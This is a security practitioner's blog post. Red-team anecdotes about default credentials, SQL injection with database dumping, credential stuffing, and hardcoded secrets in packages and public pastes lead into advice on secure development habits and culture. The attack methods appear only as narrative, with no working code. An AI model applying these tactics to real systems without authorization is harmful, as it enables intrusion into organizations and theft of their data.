Hi, Namaste, Hello, Hola, Kon’nichiwa.

So, I have been working in cybersecurity for almost two years now. I am a simple guy, at least when it comes to tech and during this time, I have picked up some simple lessons that have proved useful. I intend to share one of them in this post.

Almost every system is built by man, and almost every man, at least in the masses, can make mistakes, thus almost every system can be broken, after enough effort has been put in. This underlying tenet is one of the reasons we are seeing an increase in the number of cyberattacks in industry. If someone puts in enough effort, they somehow sneak their way inside some of the most secure organization’s systems and I tell this from my own experience of the projects of red teaming that either I have been part of, or I have seen other people execute.

Almost two years back, when I was starting on my first formal web application assessment project at my first organization, I asked my manager for any tips or methodology. She said, plain and simple, “You just start testing. Once you start, you will face questions and when you search for answers, you will create your own methodology.” One of the methods that I came to know about as I searched for those answers was that fundamentally, if you understand the behaviour of the person who built the stuff that you are trying to break, it can save you tons of time and effort and narrow down your search for finding weaknesses. Here are some examples:

  • In one of the organization’s assets that we were testing as part of a red teaming activity, we found that they were using tons and tons of web applications from third party vendors. Also, bruteforcing the password for admin user on one of their portals (that was their own native one, not from any third party vendor), we found that it was using the default credentials of admin: admin. We thought, what if this behaviour persists? If a single citizen has a habit, chances are that he learnt it from a kingdom. So, we filtered out the third party platforms from taking web screenshots and then, one by one, scoured the documentation and developer platforms of the vendors for default credentials. Bingo, we got into five portals. One of which was used to manage multiple other websites’ structure, security policies, and databases. It also contained loads of keys. Within the next few hours, we searched through the keys and Holy Smokes, we had the access to their Azure Storage next.
  • On another red teaming project, we noticed that the client was using systems built by a vendor a long time ago. An SQLi was discovered, and an OS shell was initiated from one of their web apps. We started dumping databases with SQLMap. One day, two days, the entire thing went on for two weeks. Tons and tons of data, but mostly garbage (for us). And then, we got hands on a test source code from there. In there, we noticed that the developers were mostly storing passwords for a particular database used in some application in plaintext. We dumped passwords from that particular database. Since the lead was good and the surface of applications small, we started credential stuffing. And bingo, one of the combinations worked. Then we remembered we had also found some hashed passwords in SQLMap data dump with mappings to some portals. One of the portals was the same one that we had just cracked into. We thought, what if other managers were also using similar passwords? We checked the hashed password for which we had the plaintext, and we found it against four more users. And ding, ding, ding, three more accounts down (one of the four no longer existed). We thought if we ever notice someone storing plaintext credentials like this one, we will go, we will see and we will conquer.
  • In one of the web assessments we were attempting, the portal had loads of packages for different Operating Systems. The application had been assessed in the past as well, at least three times. Yeah, life as a cybersecurity professional can be good, but it is hard sometimes, and in some cases, it can turn brutal too. :-( Since things were going tough and the client wanted findings, I thought of what kind of mistakes can be done in packages. So, I extracted one Debian package. Learn more about it here. After four weeks, I slept peacefully on that day. Not only had the package all the code written in plaintext, but it had hardcoded credentials, it had comments as to how the system is configured, which internal IP is hosting what, where do the connections to the database begin and where do they end. The dev team might have thought, who will decompile these? I knew that different teams in the client organization developed these different packages for respective OS, but what if everyone in the organization thought liked that? After installing three more operating systems to decompile and test the behaviour (whether what I was seeing was valid or not), my confidence as an analyst shot up. All the packages were the similar to the Debian one. The next day, the client organization’s security manager asked me to report the findings with extra analysis, to increase the severity and add additional details about secure coding practises in the remediation.
  • I am a bit high on recon as well, as that was my first client project. And over the years I have realized that if done incorrectly, it can go on forever. So, we need to cut down work and narrow our search to analyse the areas that can be most impacted. I have also noticed that similar mistakes across organizations are common. I read a quote somewhere on the internet that went like “Individual insanity is rare, but in the masses, it is the norm.” If you find one credential on Pastebin, chances are you will find ten more, if you find one request with sensitive data on codebeautify, chances are that you will find many more. I have found people post complete repos of applications on GitHub for a test app, and then the same test credentials from those testing repositories can be used on similar production applications.

I hope the above examples convey the point that I am trying to convey. Developers are humans. Humans are creatures of habit. Developers work in teams, the habits become stronger in teams. Their mistakes can become bigger in teams. But is the converse also true? Can we reduce those mistakes with those team habits? I certainly believe so.

From the tone and length of this post, you can guess I am talkative. Yeah, can be shy at first, but once I start talking, you will get tired of listening. As President Lincoln once put forward, “I could write shorter sermons, but when I get started I’m too lazy to stop.”

After every assessment, if I can, I like to talk to developers. Over several such assessments, I have learned a thing or two from them. Let’s start with why habits form.

I find it that this can happen at three levels, at the individual level, at the team level, and at the organization level. At all the levels, time, requirements, and culture are the main contributing factors. A brief description for the ‘How’ question that just arose in your mind is as follows:

Time

Ask a philosopher, and he will tell you that time is the only real currency in the world. A lot of mistakes happen when we are short on time. Pressure builds up, security takes a back seat, and your chances of landing in a messy situation become much higher. This applies to the individuals, teams, and organizations as a whole. When your competitor is shipping products faster than you, you tend to blast the engines at full throttle. That competitor can be another organization for an organization, a team in a similar department for a team, and an individual for an individual. Competition will never go away, and you will need to work under pressure. What you can do to avoid last minute hassles is prioritizing and planning. I will share an anecdote here.

In one application, I noticed widespread use of hardcoded keys. The application had been tested before, and I knew that was unusual in their applications. I was pretty friendly with the developer, and so I thought of asking him why it was so. He said that he had been working hard on that app since the last two sprints, many times beyond office hours. At the last moment, just a day before, a new feature was requested. He had promised a dinner date to his wife on completion of the project in return for ignoring her due to work. Since time was of the essence, he just put in the keys for testing the code while debugging something and then forgot to take care of them later. Yeah, talk about loyalty, a man can ignore a job at a multi-million dollar company for his girl. You rule the world, girls. He further said this would have never happened if the project was properly planned with the features. But anyway, I got to report more bugs. So, at least that was good, for me. Plan your project in advance, because if you repeat the cycle and security takes a back seat, after some time, security will become habituated to being seated at the back.

Requirements

Security should not be a second attribute to your product, it should be part of the main development process itself. Chalk out the security considerations, have a security engineer while you are planning the project and defining its requirements. Fixings bugs post-production is much, much more time and effort consuming than making sure to minimize them during the development process itself. As the age-old saying goes, prevention is better than cure. Take into consideration the cost of training your developers in security and hiring security engineers when required, whether external or internal, and tell your finance department to consider it as non-negotiable. Ask them whether they would spend a dollar today on cybersecurity or pay a thousand dollars to a hacker tomorrow. This applies to individuals as well. Ask your manager to give you support to learn more about developing secure systems. Ask that security engineer questions. If you can’t ask for that, then maybe you are in the wrong place, bro.

Culture

This is perhaps the most important. At an individual level, team level and the organization level, enforce cybersecurity. Make sure everyone from that kid that joined as an intern to the CEO is not afraid to ask and to take advice. Reward people who take it seriously, and I mean who really take it seriously, not those who only show that taking it seriously. I know that it can be difficult to measure as a metric and I don’t have an answer for measuring or recognizing that, yet. When I rise up the ladder and find a good enough answer, I will update these lines. Allowing people to interact about security without fear, that can take you miles ahead. Another story here, I was talking to a friend at a company (lets call it ABC), a junior developer, who had done his internship at another company and then joined ABC. He told me how he was working on a project, that was being led by someone who had shifted roles in ABC after three years. He told to the project lead that how he had learnt about cross site scripting vulnerabilities in his previous company and the prevention measures that should be taken for them. His advice was not heeded, he felt that it was because he was a junior, and he was new to the company. Later, a security audit presented several instances of cross site scripting. Ensure that the organization’s culture does not ignore the small voices. Everyone can bring something to the table.

A few more things that can contribute to a secure development can be as follows:

  • Addressing biases of developers: Developers can have preferences, they can have anchor bias as they will give more weight to the information that comes first, they can be too much optimistic, etc. etc. While this can be very difficult to address, encouraging rationalism can sure help.
  • Avoid overestimation of the abilities: From teams to individuals, keep expectations ambitious, but real. That will help in planning better, in executing better and in rewarding better.
  • To change behaviour, change the environment. Enable a culture amongst your colleagues, teams and companies that can help in understanding and helping implement security. If you are interested in reading how behavioural psychology works in software development, I found this brief but great blog post while writing and reading for this post.

Yup, that’s all for this post. Will keep updating it as and when I learn new things. Your suggestions are welcome.

Happy and Secure Development.

Let’s have a chat on Twitter: Abhishek

Also, feel free to reach out on any social media handles mentioned at the end of this blog page.


<
Previous Post
Some Practices to Make Software Development More Secure
>
Next Post
Getting Together for Security: Shared Responsibility Models